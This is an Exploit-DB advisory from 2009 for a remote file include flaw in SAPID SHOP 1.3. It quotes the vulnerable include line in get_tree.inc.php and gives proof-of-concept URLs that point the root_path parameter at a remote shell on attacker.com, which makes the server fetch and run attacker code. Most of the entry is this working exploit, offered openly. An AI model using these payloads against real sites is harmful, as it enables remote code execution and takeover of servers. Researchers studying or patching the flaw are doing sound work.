SAPID SHOP <= 1.3 - Remote File Include Vulnerability

2009-12-03T00:00:00
ID EDB-ID:10288
Type exploitdb
Reporter cr4wl3r
Modified 2009-12-03T00:00:00

Description

SAPID SHOP <= 1.3 Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            #Download Script      :  http://sourceforge.net/projects/sapid/files
########################################################################
#
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     &lt;?php
#       require $forms_dir."calmenuform.php"; if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?&gt;
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
#
########################################################################
#Vuln : ./SAPID-SHOP-1.3/usr/extensions/get_tree.inc.php (line 11)
#
#     &lt;?php
#       if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
#       include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#      ?&gt;
#
#PoC  :  http://server/[path]/usr/extensions/get_tree.inc.php?root_path=http://attacker.com/shell.txt???
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################

   [ Gorontalo / 2009 ]